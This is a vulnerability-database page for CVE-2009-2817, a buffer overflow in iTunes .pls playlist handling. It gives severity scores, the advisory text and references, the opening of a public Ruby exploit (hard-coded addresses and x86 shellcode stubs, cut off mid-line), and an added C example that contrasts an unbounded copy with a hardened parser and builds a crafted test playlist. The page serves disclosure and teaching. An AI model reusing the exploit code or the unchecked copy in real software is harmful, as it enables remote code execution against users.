CVE-2009-2817
Published: 2009-09-24
Priority: P3 (48) · Severity: critical · CVSS 2.0 base score 9.3 (vector AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit: public exploit code available (see the Exploit-DB entries below)
EPSS: 8.95% (94.6th percentile)
Buffer overflow in Apple iTunes before 9.0.1 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted .pls file.
Affected
73 ranges indexed (25 shown on the page); only the first carries version data, the rest are empty placeholder rows.
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apple | itunes | <= 9.0 | 9.0.1 (per the advisory text: versions before 9.0.1 are vulnerable) |
No detection rules found.
Exploit-DB
Apple iTunes 9.0.1 - '.pls' Handling Buffer Overflow (exploitdb, 2010-02-17, CVSS 9.3, CRITICAL, CVE-2009-2817)
Note the version in the Exploit-DB title: the script header below gives the tested version as 9.0, and 9.0.1 is the fixed release, so the title should not be read as 9.0.1 being affected.
---
```ruby
# Exploit Title: iTunes .pls file handling buffer overflow
# Date: 2009.12.20
# Author: S2 Crew [Hungary]
# Software Link: -
# Version: 9.0
# Tested on: OSX 10.5.8, Windows XP SP2 (/GS flag, DOS)
# CVE: CVE-2009-2817
# Code:
#!/usr/bin/env ruby
# Hard-coded absolute addresses for the tested OS X 10.5.8 build; they are
# build-specific and will not hold on other builds.
SETJMP = 0x92F04224
JMP_BUF = 0x8fe31290
STRDUP = 0x92EED110
# 8fe24459 jmp *%eax
JMP_EAX = 0x8fe24459
# Assembles the x86 stub that (per its name) transfers execution to the
# payload placed on the heap. Each fragment is raw machine code packed into
# a string; the constants above are written in little-endian ("V") form.
def make_exec_payload_from_heap_stub()
  frag0 =
    "\x90" +               # nop
    "\x58" +               # pop eax
    "\x61" +               # popa
    "\xc3"                 # ret
  frag1 =
    "\x90" +               # nop
    "\x58" +               # pop eax
    "\x89\xe0" +           # mov eax, esp
    "\x83\xc0\x0c" +       # add eax, byte +0xc
    "\x89\x44\x24\x08" +   # mov [esp+0x8], eax
    "\xc3"                 # ret
  exec_payload_from_heap_stub =
    frag0 +
    [SETJMP, JMP_BUF + 32, JMP_BUF].pack("V3") +
    frag1 +
    "X" * 20 +
    [SETJMP, JMP_B
```
Exploit-DB
Apple iTunes 9.0 - '.pls' Buffer Overflow (exploitdb, 2009-09-22, CVE-2009-2817)
---
source: https://www.securityfocus.com/bid/36478/info
Apple iTunes is prone to a buffer-overflow vulnerability because the software fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.
Versions prior to Apple iTunes 9.0.1 are vulnerable.
The script attached to this entry is the same S2 Crew Ruby exploit (identical constants and make_exec_payload_from_heap_stub) shown in the entry above and is not repeated here.
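The bug class described in the advisory text is a user-supplied string copied into a fixed-size buffer with no length check. The program below is an added illustration of that pattern on a minimal .pls playlist parser; it is not iTunes code and not the routine the exploit targets. `load_entry_unsafe` reproduces the unbounded copy, `load_entry_safe` and `parse_pls` show the bounded version that refuses an over-long `FileN=` value rather than truncating it, and `make_crafted_pls` constructs an in-memory playlist with an oversized `File1=` value, the shape a crafted .pls takes. The 64-byte `URL_MAX` buffer, the function names and the sample playlist are all assumptions of the example.

```c
/* Added example (not iTunes code): the missing bounds check behind a .pls
 * buffer overflow, shown on a minimal playlist parser. Buffer size, function
 * names and the sample playlist are constructed for the illustration. */
#include <stdio.h>
#include <string.h>

#define URL_MAX 64   /* fixed-size destination buffer, deliberately small */

/* Locate the value after '=' in one "Key=Value" line. The line is a slice
 * [line, line+len) of the whole file and is not NUL-terminated. */
static const char *find_value(const char *line, size_t len, size_t *vlen)
{
    const char *eq = memchr(line, '=', len);
    if (!eq) return NULL;
    const char *v = eq + 1;
    size_t n = (size_t)(line + len - v);
    if (n && v[n - 1] == '\r') n--;   /* tolerate CRLF playlists */
    *vlen = n;
    return v;
}

/* Vulnerable pattern: copies the value into a URL_MAX buffer with no length
 * check. A FileN= value of URL_MAX bytes or more writes past the buffer
 * (undefined behaviour), so only call it with short input. */
int load_entry_unsafe(const char *line, size_t len, char url[URL_MAX])
{
    size_t n;
    const char *v = find_value(line, len, &n);
    if (!v) return -1;
    memcpy(url, v, n);       /* the missing bounds check */
    url[n] = '\0';
    return 0;
}

/* Hardened version: refuse (rather than silently truncate) values that do
 * not fit, so a crafted playlist is rejected instead of corrupting memory. */
int load_entry_safe(const char *line, size_t len, char *url, size_t cap)
{
    size_t n;
    const char *v = find_value(line, len, &n);
    if (!v) return -1;
    if (n >= cap) return -2;  /* no room for value plus terminator */
    memcpy(url, v, n);
    url[n] = '\0';
    return 0;
}

/* Walk a .pls buffer with the hardened loader. Returns the number of FileN=
 * entries stored, or a negative code: -1 not a playlist, -2 over-long value,
 * -3 more entries than the caller's array holds. */
int parse_pls(const char *pls, char urls[][URL_MAX], int max_entries)
{
    if (strncmp(pls, "[playlist]", 10) != 0) return -1;
    int count = 0;
    const char *line = pls;
    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        if (len > 5 && strncmp(line, "File", 4) == 0) {   /* "FileN=..." */
            if (count == max_entries) return -3;
            int rc = load_entry_safe(line, len, urls[count], URL_MAX);
            if (rc) return rc;
            count++;
        }
        if (!nl) break;
        line = nl + 1;
    }
    return count;
}

/* Build a playlist whose File1= value is file1_len bytes of 'A' (constructed
 * sample input). Returns the string length, or 0 if it does not fit in out. */
size_t make_crafted_pls(size_t file1_len, char *out, size_t cap)
{
    static const char head[] = "[playlist]\nNumberOfEntries=1\nFile1=";
    static const char tail[] = "\nTitle1=x\nLength1=-1\nVersion=2\n";
    size_t need = (sizeof head - 1) + file1_len + sizeof tail; /* incl. NUL */
    if (need > cap) return 0;
    char *p = out;
    memcpy(p, head, sizeof head - 1);
    p += sizeof head - 1;
    memset(p, 'A', file1_len);
    p += file1_len;
    memcpy(p, tail, sizeof tail);
    return need - 1;
}

int main(void)
{
    char pls[1024], urls[2][URL_MAX];
    make_crafted_pls(20, pls, sizeof pls);
    printf("benign playlist: rc=%d\n", parse_pls(pls, urls, 2));
    make_crafted_pls(200, pls, sizeof pls);
    printf("crafted playlist: rc=%d (rejected)\n", parse_pls(pls, urls, 2));
    return 0;
}
```

The hardened loader rejects rather than truncates because a silently shortened URL changes what the player opens; refusing the entry keeps the parser's behaviour explicit and makes the malformed playlist visible to whoever is reading the error.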
No writeups or analysis indexed.
References
http://lists.apple.com/archives/security-announce/2009/Sep/msg00006.html
http://support.apple.com/kb/HT3884
http://www.securityfocus.com/bid/36478
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6290